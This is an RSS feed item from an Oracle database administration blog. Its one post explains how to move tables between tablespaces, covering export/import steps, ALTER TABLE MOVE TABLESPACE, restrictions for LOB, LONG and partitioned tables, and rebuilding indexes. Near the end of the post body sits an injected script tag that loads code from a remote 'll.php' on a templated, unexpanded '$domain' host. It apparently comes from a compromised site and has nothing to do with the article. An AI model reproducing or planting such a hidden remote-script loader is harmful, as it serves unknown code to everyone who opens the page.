<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; Move Table from one Tablespace to another Tablespace</title>
	<atom:link href="http://www.bestremotedba.com/tag/move-table-from-one-tablespace-to-another-tablespace/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Move Tables Between Tablespaces</title>
		<link>http://www.bestremotedba.com/move-tables-between-tablespaces/</link>
		<comments>http://www.bestremotedba.com/move-tables-between-tablespaces/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 06:52:10 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[Database Administration]]></category>
		<category><![CDATA[Database Maintenance]]></category>
		<category><![CDATA[Move Table from one Tablespace to another Tablespace]]></category>
		<category><![CDATA[Move Tables Between Tablespaces]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=113</guid>
		<description><![CDATA[Move Table from one Tablespace to another Tablespace]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>Move Tables Between Tablespaces / Move Table from one Tablespace to another Tablespace</p>
<p>	There are many methods available to move the tables between tablespaces.</p>
<p>1. Export /Import<br />
	export the existing table<br />
	remove quota from the old tablespace<br />
	change the default tablespace to the new tablespace<br />
	drop the old table<br />
	import the table<br />
	change the default tablespace back again<br />
	restore quota on the old tablespace </p>
<p>2. ALTER TABLE<br />
<table_name> MOVE TABLESPACE < target_tablespace></p>
<p>	This is possible Only if U are on 8i Provided the table does not have LOBs<br />
	You cannot MOVE an entire partitioned table (either heap or index organized). You must move individual partitions or subpartitions.<br />
    You cannot move a table with a LONG or LONG RAW. You must exp that table and imp it into a table<br />
	Recreate underlying indexes using &#8216;alter index rebuild&#8217;<br />
	Check the Invalid objects using this table and compile it to become valid.<br />
	The indexes on the tables being moved will become unusable after the table, rebuild them right after moving a table &#8212; before moving the next table (to reduce downtime).<br />
<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/move-tables-between-tablespaces/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

